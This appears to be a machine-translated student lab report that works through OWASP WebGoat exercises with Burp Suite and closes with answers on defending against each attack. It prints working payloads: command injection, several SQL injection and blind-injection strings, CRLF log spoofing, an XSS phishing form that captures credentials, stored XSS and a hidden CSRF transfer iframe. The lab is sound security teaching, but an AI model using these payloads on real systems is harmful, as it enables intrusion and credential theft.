PS: I was twice doing this experiment, the second experiment when the computer out a little problem stalled ... originally, There is a picture of the results of the blog did not save the diagram ... WebGoat
- Webgoat is a flawed Java EE Web application maintained by the famous owasp, which is not a bug in the program, but is deliberately designed to teach Web application security Courses. This application provides a realistic teaching environment that provides clues to the user completing the Course.
- Because Webgoat is a java-based software, it is platform agnostic and can be operated on a variety of operating platforms, so the system for this experiment is Kali machine
- Run the related package by entering the following command on the commands line
jar
java -jar webgoat-container-7.0.1-war-exec.jar
- Webgoat uses port 8080 by default, so you'll see a hint:
INFO: Starting ProtocolHandler ["http-bio-8080"]后即可开始
- Open browser, Access
localhost:8080/WebGoat
, login can
Burpsuite
- Burp Suite is an integrated platform for attacking web Applications. It contains a number of tools and has designed many interfaces for these tools to facilitate the process of speeding up attacks on Applications.
-
- On the left side of the desktop Shortcut Bar to find, Open him, has been
next
good;
Proxy
Options
, Click Add
, Configure a port number yourself, and remember to tick the one you've got, then click Run:
- Open the Settings page for your browser, and
Advanced
Network
Settings
:
- Follow the Settings:
- If you need to intercept the page, click on the proxy to
intercept
open it.
Injection Flawscommand Injection
- This interface can execute system commands and return them to the user, so you should add shell commands to the request and execute
ifconfig
specifically, This is the one mentioned in the previous article
BurpSuite
the
tool intercepts the request and changes its parameters to (mine is):
AccessControlMatrix.help"& ifconfig"
- Represents the execution of these 2 instructions, at the end of the page can see the results of ifconfig, successful
Numeric SQL Injection
- Requirements: try SQL injection so that all the weather can be found
- The idea is also very simple, directly constructs the eternal truth type, can find all records
- You can either follow the idea of the previous question with a tool to modify the package, or you can directly press
F12
modify the Web page source file, you need to find the value to:101 or 1=1
- Click Go to see all the City's weather, success
Log Spoofing
- The title of the topic is to write a SQL string because the page will return you the wrong username, so our goal is to make the page return to your results as shown by your login success
- So in the user name that constructs the Statement:
gq%0d%0aLogin Succeeded for username: admin
Lab:sql injectionstage 1:string SQL Injection
- According to the description, it is required that you do not know the password premise, you can also log on successfully
- Using sql-related syntax, Enter
‘or 1=‘1
- Failed and found more than the character Length. Modify source code (string format and length), enter ' or 1 = ' 1 again
- Success
Stage 2:parameterized Query #1
Stage 3:numeric SQL Injection
Stage 4:parameterized Query #2
String SQL Injection
- Requirements: You must enter the correct last name to log in
Because you do not know the password, so use the universal key to try, according to the previous input:
‘or 1=‘1
- success, because for the ever-true, so any user information is seen
Database backdoors
- According to the topic request is to you to use multiple statements of SQL injection, update the data table
- Based on the previous Blog's multiple statement injection exercises, here, set the following SQL Statement:
101; update employee set salary=10000
- Find data sheet all personnel pay equals 10000 has been updated, successful
The second step requires no understanding
.
Blind Numeric SQL injection:
- Digital blind injection, requires finding the value of the Pin field in a record in the pins table with a value of cc_number field of 1111222233334444;
101 AND ((SELECT pin FROM pins WHERE cc_number=‘1111222233334444‘) >(或者<) 100 );
to speculate, using the idea of binary, to determine the final answer2364
Blind String SQL injection:
- String blind injection, which requires finding the numeric value of the Pin field in a record in the pins table with a value of cc_number field of 4321432143214321. The Pin field type is varchar;
- This is the same as the previous question, guess the ASCII value, the answer is jill;
Cross-site Scripting (xss) Phishing with XSS
Phishing with XSS:XSS fishing, requires creating a form, tricking the visitor into entering a username password, and submitting the form to http://localhost:8080/WebGoat/capture/PROPERTY=yes&ADD_CREDENTIALS_HERE
;
The following is a code example:
</Form><Script>functionHack) {xssimage=New Image; Xssimage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" +Document.phish.user.value +"&password=" +Document.phish.pass.value +""; Alert ("had this been a real attack ... Your credentials were just Stolen. User Name = "+Document.phish.user.value +"Password =" +document.phish.pass.value);}</Script><FormName="phish" ><Br><Br><Hr><H3>this feature requires account login:</H2><Br><Br>enter Username:<Br><InputType="text"Name="user" ><Br>enter Password:<Br><input type= "password" name = "pass" ><br><input type= "submit" name= "login" value= "login" onclick=" hack () "></ Form><br>< br><hr>
Stored XSS Attacks
- A storage-type XSS attack that requires writing a Web page or popup in a letter;
- Here's How It's done:
- Title can be arbitrary input, according to the first attempt can be found that the input can be as a hyperlink update saved in this interface, click to view the input content
- Message input messages, can embed a section of JS code, the user clicks can be triggered, such as Input:
<script>alert("5234 attack succeed!");</script>
Cross Site Request forgery (CSRF)
- Here is an example of a storage-type XSS and csrf combination, csrf is an imposter login, and a code forgery request
- Here is the use of CSRF malicious code storage-type XSS on the Web page, through the message message input, the construction of malicious code as follows
<iframe src="attack?Screen=504&menu=900&transferFunds=5000"></iframe>
- When the user clicks this message, it will be triggered, showing that has been transferred 5000 yuan
- note: The values of the screen and menu parameters above are consistent with those displayed on the right side of the site
- If you want the user to be able to
<iframe>
set the length and width parameters to 1 pixels in the case of no-sleep, it is not visible.
Answer questions after the experiment
- (1) SQL injection attack principle, how to defend
Principle: the basic principle of SQL injection attack is to commit the special illegal code from the Client's legitimate interface, inject it into the server-side execution of the business sql, and change the original logic of SQL statement and affect the processing of the Server-side normal business.
Defense:
- The SQL statement that performs the validation;
- Use regular expressions to mask special characters;
- Use PreparedStatement instead of statement;
- (2) the principle of XSS attack, how to Defend
Principle: The main purpose of XSS attack is to find a way to obtain the target attack website cookie, because the cookie is equivalent to seesion, with this information can be in any PC can access the Internet access to the website, and the other People's Health landing, do some damage.
Defense:
- When a malicious code value is displayed as the content of a tag: HTML tags and some special characters ("< > &, etc.) are filtered in places where HTML input is not required and converted into characters that are not interpreted by the Browser.
- When malicious code is displayed as a property of a tag, by using "truncate attributes to open up new properties or malicious methods: both the single and double quotes that exist in the property itself need to be transcoded, the HTML tags and tag attributes that are entered by the user are whitelisted, and the tags and attributes of some vulnerabilities can be specifically filtered."
- (3) CSRF attack principle, how to defend
Principle: The main purpose of the CSRF attack is to allow users to unknowingly attack a system they have logged in, similar to Fishing.
Defense:
- Detect user Submissions by referer, token, or verification code.
- Try not to expose user privacy information in the link to the Page.
- It is best to use the post operation for actions such as user modification and Deletion.
- Avoid general-purpose cookies and strictly set the domain of Cookies.
20145234 Huangfei "network countermeasure technology" Experiment ix, Web security Basic Practice